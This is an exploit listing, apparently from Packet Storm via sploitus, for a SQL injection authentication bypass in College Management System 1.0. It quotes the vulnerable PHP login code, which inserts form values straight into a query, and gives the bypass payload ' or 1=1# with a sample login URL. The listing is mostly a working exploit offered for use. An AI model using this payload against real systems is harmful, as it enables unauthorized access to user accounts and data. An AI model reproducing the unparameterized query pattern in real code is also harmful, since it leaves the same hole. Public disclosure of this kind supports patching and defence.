Exploit for College Management System 1.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:164379
# Exploit Title: college management system - SQL Injection Authentication Bypass  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman https://twitter.com/infosec_90  
# Vendor Homepage: https://www.eedunext.com/  
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/  
# Version: 1.0  
# Tested on: Kali Linux  
  
  
in login/login.php in line 8 :  
  
$username=$_POST["email"];  
$password=$_POST["password"];  
  
$query="select * from login where user_id='$username' and Password='$password' ";  
$result=mysqli_query($con,$query);  
  
  
POC :  
http://127.0.0.1/2/College-Management-System/login/login.php  
username : ' or 1=1#  
password : 123456